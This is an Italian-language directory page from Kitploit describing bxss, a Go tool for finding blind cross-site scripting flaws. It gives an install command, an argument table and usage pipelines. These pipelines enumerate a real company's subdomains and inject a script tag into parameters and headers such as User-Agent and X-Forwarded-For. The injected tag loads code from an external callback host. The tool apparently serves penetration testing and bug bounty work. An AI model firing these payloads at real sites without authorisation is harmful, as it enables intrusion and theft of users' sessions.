Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
bxss — Blind XSS Scanner è uno strumento che può essere utilizzato per scansionare vulnerabilità XSS cieche nelle applicazioni web. | Kitploit
Strumenti/GitHubGitHub/ethicalhackingplayground/bxss
Scanner di VulnerabilitàScanner di Vulnerabilità WebRaccolta InformazioniSicurezza WebPenetration Testing
GitHubethicalhackingplayground/bxss

bxss

Blind XSS Scanner è uno strumento che può essere utilizzato per scansionare vulnerabilità XSS cieche nelle applicazioni web.

Vedi Repository
418551 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi


Bxss
Bxss - Scanner XSS Blind

Versione Licenza Report Go Riferimento Go


🚀 Descrizione

Bxss è uno scanner XSS Blind ad alte prestazioni che automatizza il rilevamento di vulnerabilità XSS blind nelle applicazioni web.


✨ Caratteristiche

  • Inietta payload XSS Blind in header e parametri personalizzati
  • Supporta molteplici metodi HTTP (PUT, POST, GET, OPTIONS)
  • Scansione ad alta velocità con supporto alla concorrenza
  • Facilmente concatenabile con altri strumenti
  • Installazione e utilizzo semplici

🧠 In Corso

Stiamo lavorando attivamente all'integrazione di un pool di worker basato su Chromium per migliorare le prestazioni di bxss su dispositivi con basse specifiche.

Questa funzionalità permetterà di delegare compiti onerosi, come il rilevamento XSS basato su DOM o l'ispezione dei payload dopo l'attivazione, a istanze Chromium leggere gestite tramite un pool. Distribuendo il carico di lavoro su più contesti di browser headless in modo controllato ed efficiente, bxss rimarrà reattivo e utilizzabile anche su macchine con specifiche ridotte.

Questo renderà bxss non solo potente ma anche altamente accessibile, indipendentemente dai vincoli di sistema.


✅ TODO

  • Pool di worker basato su Chromium per interazione DOM e verifica visiva
  • Output di reporting HTML/JSON opzionale
  • Aggiungere supporto per personalizzazione dei payload multi-piattaforma (XSS Hunter, Interactsh, ecc.)
  • Supporto proxy
  • Importare richieste personalizzate

🧪 Funzionalità Sperimentali

  • Modalità Trace (sperimentale)

📦 Installazione

root@kitploit:~
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest

⚙️ Argomenti


🎬 Dimostrazione

Demo


📝 Cos'è la modalità Trace?

La modalità Trace è una funzionalità sperimentale che permette di tracciare dove il BlindXSS è stato attivato. Alcune piattaforme BlindXSS di terze parti, come https://xss.report/, consentono di specificare parametri personalizzati nei tuoi payload, permettendo di tracciare dove il BlindXSS è stato attivato. Ad esempio, se specifichi il parametro url=https://somehost.com nel tuo payload, lo strumento utilizzerà il payload

root@kitploit:~
'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'

per i test e, al momento dell'attivazione, potrai ispezionare il DOM e vedere da quale host il BlindXSS è stato attivato.

Report XSS

Assicurati, quando assegni parametri personalizzati nella tua dashboard, di assegnare url={LINK} in modo che bxss possa sostituire automaticamente {LINK} con l'URL effettivo.

🔥 Esempi di Utilizzo

Parametri

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t

Aggiungi ai Parametri

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t

Sia Header che Parametri

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

Header X-Forwarded-For

root@kitploit:~
subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"

Header e Parametri Personalizzati

root@kitploit:~
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

Google Dorks con Dorki

root@kitploit:~
curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'

Header e Parametri Personalizzati con Limite di Velocità

root@kitploit:~
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \ 
-t \
-rl 10

Per dorking avanzato ed esplorazione di vulnerabilità, dai un'occhiata a Dorki e iscriviti oggi!


☕ Supporta il Progetto

Se ottieni una ricompensa usando questo strumento, considera di supportarmi offrendomi un caffè!

Offrimi un Caffè

Scarica lo strumento
ArgomentoDescrizionePredefinito
-aAggiunge il payload al parametrofalse
-c intImposta il livello di concorrenza30
-H stringImposta un header personalizzato""
-hf stringPercorso del file con gli header""
-p stringIl payload XSS blind""
-pf stringPercorso del file con i payload""
-tTesta i parametri per XSS blindfalse
-X stringMetodo HTTP da utilizzare""
-vAbilita modalità debugfalse
-rl floatLimite di velocità (richieste al secondo)0
-fSegui i redirectfalse
-lAbilita la modalità Trace (sperimentale)false